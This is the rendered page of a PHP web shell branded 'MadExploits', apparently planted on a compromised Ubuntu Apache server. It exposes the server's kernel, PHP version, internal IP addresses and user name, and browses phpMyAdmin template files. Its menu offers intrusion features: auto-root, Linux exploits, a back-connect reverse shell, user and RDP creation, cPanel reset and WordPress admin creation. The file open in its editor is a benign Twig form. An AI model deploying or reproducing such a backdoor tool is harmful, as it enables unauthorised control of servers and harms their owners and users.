Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
phpmyadmin /
templates /
table /
[ HOME SHELL ]
Name
Size
Permission
Action
browse_foreigners
[ DIR ]
drwxr-xr-x
chart
[ DIR ]
drwxr-xr-x
delete
[ DIR ]
drwxr-xr-x
export
[ DIR ]
drwxr-xr-x
find_replace
[ DIR ]
drwxr-xr-x
gis_visualization
[ DIR ]
drwxr-xr-x
import
[ DIR ]
drwxr-xr-x
insert
[ DIR ]
drwxr-xr-x
maintenance
[ DIR ]
drwxr-xr-x
operations
[ DIR ]
drwxr-xr-x
partition
[ DIR ]
drwxr-xr-x
privileges
[ DIR ]
drwxr-xr-x
relation
[ DIR ]
drwxr-xr-x
search
[ DIR ]
drwxr-xr-x
structure
[ DIR ]
drwxr-xr-x
tracking
[ DIR ]
drwxr-xr-x
zoom_search
[ DIR ]
drwxr-xr-x
index_form.twig
9.53
KB
-rw-r--r--
index_rename_form.twig
1005
B
-rw-r--r--
page_with_secondary_tabs.twig
746
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index_rename_form.twig
<form action="{{ url('/table/indexes/rename') }}" method="post" name="index_frm" id="index_frm" class="ajax"> {{ get_hidden_inputs(form_params) }} <fieldset id="index_edit_fields"> <div class="index_info"> <div> <div class="label"> <strong> <label for="input_index_name"> {% trans 'Index name:' %} {{ show_hint('"PRIMARY" <b>must</b> be the name of and <b>only of</b> a primary key!'|trans) }} </label> </strong> </div> <input type="text" name="index[Key_name]" id="input_index_name" size="25" maxlength="64" value="{{ index.getName() }}" onfocus="this.select()"> </div> </div> </fieldset> <fieldset class="tblFooters"> <button class="btn btn-secondary" type="submit" id="preview_index_frm">{% trans 'Preview SQL' %}</button> </fieldset> </form>
Close